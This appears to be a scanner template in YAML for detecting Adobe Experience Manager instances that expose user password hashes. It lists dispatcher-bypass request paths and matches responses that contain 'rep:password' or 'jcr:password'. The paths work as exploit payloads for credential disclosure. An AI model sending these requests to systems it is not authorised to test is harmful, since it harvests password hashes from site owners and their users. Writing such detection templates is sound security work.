id: aem-secret-leak
donce: true
info:
  name: AEM Secret Leak
  risk: High

params:
  - root: "{{.BaseURL}}"

variables:
  - endpoint: |
      ///content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
      /content/dam/formsanddocuments.form.validator.html/home/users/k.1.json
      /content/srp-tools/jcr:content/browser.srp.json?path=/home/users/k/kyfEA-OQ_iWFHxj8AEKk
      ///content/dam/formsanddocuments.form.validator.html/home/users/k.1.json
      ///content/srp-tools/jcr:content/browser.srp.json?path=/home/users/k/kyfEA-OQ_iWFHxj8AEKk
      /content/srp-tools/jcr:content/browser.srp.json?path=/content/dam
      ///content/srp-tools/jcr:content/browser.srp.json?path=/content/dam
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "jcr:primaryType") && StringSearch("response", "rep:password")
      - >-
        StatusCode() == 200 && StringSearch("response", "jcr:password") && StringSearch("response", "sling:resourceType")

reference:
  - note: |
      Leak hash password of users
